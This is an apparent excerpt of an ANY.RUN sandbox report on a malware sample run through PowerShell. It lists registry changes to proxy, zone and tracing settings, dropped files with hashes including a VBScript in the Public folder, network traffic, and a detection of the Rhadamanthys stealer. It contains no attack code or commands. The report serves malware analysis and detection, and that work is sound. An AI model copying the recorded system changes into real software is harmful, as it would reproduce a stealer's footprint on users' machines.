c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
Total events
78 407
Read events
78 021
Write events
368
Delete events
18

Modification events

(PID) Process:(3324) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3324) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3324) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3324) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(4072) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(4072) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(4072) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(4072) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(4072) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(4072) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
Executable files
1
Suspicious files
319
Text files
57
Unknown types
7

Dropped files

PID
Process
Filename
Type
3324powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_x11sgyqb.wxz.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
880powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_snwgaeve.4oa.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4072powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_asbldyyp.0gv.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4072powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SB9035E8QQP9L9BT9ERG.tempbinary
MD5:0BE6EF689FBD90825414B2853F6522FA
SHA256:1F74C77C48BF64C5DFBEBEE9C81D86F2B376A62C8F68E19E503D194E56941503
880powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rko1u4ld.iuc.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4072powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b1a1c1d805115a10.customDestinations-msbinary
MD5:0BE6EF689FBD90825414B2853F6522FA
SHA256:1F74C77C48BF64C5DFBEBEE9C81D86F2B376A62C8F68E19E503D194E56941503
4072powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yveigid5.yd5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3324powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tktomoj2.neh.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4072powershell.exeC:\Users\Public\p2q.vbstext
MD5:8DF76AF54C38D5D4C2CD9F6D18EEDF92
SHA256:2FD9440E21ADF91473719E9FB085F4D47A1D5AFCF02333A7F04D2A0F4D0B1C77
4072powershell.exeC:\Users\admin\Desktop\List of Required items and services.pdfpdf
MD5:E7CB275663A518442FD2400BFEB0D079
SHA256:AC19E9EC19B3F120928995449C99DB63C22AD6EF7030EB113A8FCF29A82A69EA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
46
TCP/UDP connections
167
DNS requests
137
Threats
12

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1544
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
unknown
2672
svchost.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
2672
svchost.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
3872
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
unknown
5220
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
unknown
5220
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
unknown
6260
AdobeARM.exe
GET
304
23.48.23.34:80
http://acroipm2.adobe.com/assets/Owner/arm/ReportOwner.txt
unknown
unknown
3040
OfficeClickToRun.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
unknown
2628
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
unknown
6260
AdobeARM.exe
GET
404
23.48.23.34:80
http://acroipm2.adobe.com/assets/Owner/arm/2024/7/UC/Other.txt
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2672
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4032
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:138
whitelisted
3992
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
1436
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4656
SearchApp.exe
104.126.37.153:443
r.bing.com
Akamai International B.V.
DE
unknown
1544
svchost.exe
40.126.31.69:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
1544
svchost.exe
192.229.221.95:80
EDGECAST
US
whitelisted
1060
svchost.exe
23.35.238.131:443
go.microsoft.com
AKAMAI-AS
DE
unknown

DNS requests

Domain
IP
Reputation
r.bing.com
  • 104.126.37.153
  • 104.126.37.184
  • 104.126.37.163
  • 104.126.37.171
  • 104.126.37.179
  • 104.126.37.155
  • 104.126.37.162
  • 104.126.37.168
  • 104.126.37.161
whitelisted
login.live.com
  • 40.126.31.69
  • 40.126.31.67
  • 20.190.159.73
  • 40.126.31.71
  • 20.190.159.0
  • 20.190.159.68
  • 20.190.159.64
  • 20.190.159.2
whitelisted
go.microsoft.com
  • 23.35.238.131
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
self.events.data.microsoft.com
  • 52.168.117.174
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted
slscr.update.microsoft.com
  • 40.127.169.103
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted

Threats

PID
Process
Class
Message
6352
OOBE-Maintenance.exe
A Network Trojan was detected
STEALER [ANY.RUN] Rhadamanthys SSL Certificate and JA3s
11 ETPRO signatures available at the full report
Process
Message
OOBE-Maintenance.exe
[thresholding] image = 000001E9246F3050 , (0 , 1220) (0 , 610)
OOBE-Maintenance.exe
[thresholding] image = 000001E9246F3050 , (0 , 1078) (0 , 539)
OOBE-Maintenance.exe
[thresholding] image = 000001E925407040 , (0 , 1521) (0 , 760)
OOBE-Maintenance.exe
[thresholding] image = 000001E925407040 , (0 , 1543) (0 , 772)
OOBE-Maintenance.exe
[thresholding] image = 000001E9246F3050 , (0 , 1325) (0 , 662)
OOBE-Maintenance.exe
[thresholding] image = 000001E924473E60 , (0 , 1020) (0 , 510)
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
powershell.exe